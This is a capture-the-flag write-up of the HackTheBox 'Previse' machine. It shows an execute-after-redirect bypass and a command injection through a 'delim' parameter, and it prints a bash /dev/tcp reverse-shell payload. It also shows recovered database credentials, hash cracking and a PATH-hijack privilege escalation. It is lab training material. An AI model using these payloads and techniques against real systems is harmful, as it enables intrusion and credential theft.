HackTheBox — Previse

5 min readJan 26, 2022

We start with nmap to discover open ports and services.

Nmap Scan

nmap -sC -sV -oA previse

Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for
Host is up (0.21s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two open ports, ssh on 22 and http on 80, and their versions have no serious vulnerabilities.

So lets enumerate http port.

Enumerating HTTP

Going to redirects us to

The page ends with .php, we know it’s a php app, so when we run a directory bruteforcer we need to specify .php extension.

I tried loggin in with admin:admin, admin:password and tried simple login bypass test’ or 1=1 — — but nothing worked.

So i launched gobuster with raft-medium-words.txt from Seclist gobuster dir -u -w raft-medium-words.txt -t 100 -x php -b 404,403

When i try to access any of these files it redirects me to login.php. BUT when i intercept the request before redirecting, it says 302 Found but i can see the content of the page.

Lets visit /accounts.php

As you can see we can create a new user by submitting the same data as the form has, so to create a new user we need to send a POST request to /accounts.php with POST parameters username and password and confirm.

Now we have a new user embo1:embo1 lets login with it.

And we are logged in. There is SITEBACKUP.ZIP file and a user newguy in FILES page, lets download it.

As the file name says, it’s the backup of the web site.

The config.php file contains mysql credentials.


In logs.php file it uses exec function on the POST parameter delim directly without validation.

So we can intercept the request and do something like this delim=space;whoami, but it will not reflect in the response so lets try ping our machine delim=space;ping -c1 <Our IP> (Don't forget to URL encode) and run tcpdump to capture it sudo tcpdump -n -i tun0 icmp

And we received ICMP echo request, now we have command execution lets get a shell on the box.

Initial Foothold

Lets replace the ping command with a reverse shell and run a netcat listener. delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'

We reveiced a connection and we are on the box as www-data.

Getting User

After some enumeration i couldn’t find anything but remember the mysql credentials we got before? lets login to mysql using root:mySQL_p@ssw0rd!:)

I found accounts table inside previse database that contains m4lwhere md5crypt hash.

lets save the hash to a file to crack it with hashcat or john. hashcat -m 500 hash.txt rockyou.txt OR john hash.txt --wordlist=/opt/rockyou.txt --format=md5crypt I use hashcat on my windows host because it's much faster than john.


Now we have m4lwhere:ilovecody112235! lets ssh into the machine (or just use **su m4lwhere — **).

Getting Root

By running sudo -l we can run /opt/scripts/access_backup.sh as root.

Looking at the script, it’s running gzip without specifying the full path, means we can modify the $PATH variable to make it search for gzip in another directory where we have our own gzip script.

Lets create our gzip script in /dev/shm/ directory. chmod +x gzip

Now modifying $PATH variable to start with the directory that has our script.

Run a netcat listener nc nvlp 1337 and run the script sudo /opt/scripts/access_backup.sh

And we are ROOT !

If you find it useful, kindly give me a respect

Linkedin | Github




I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.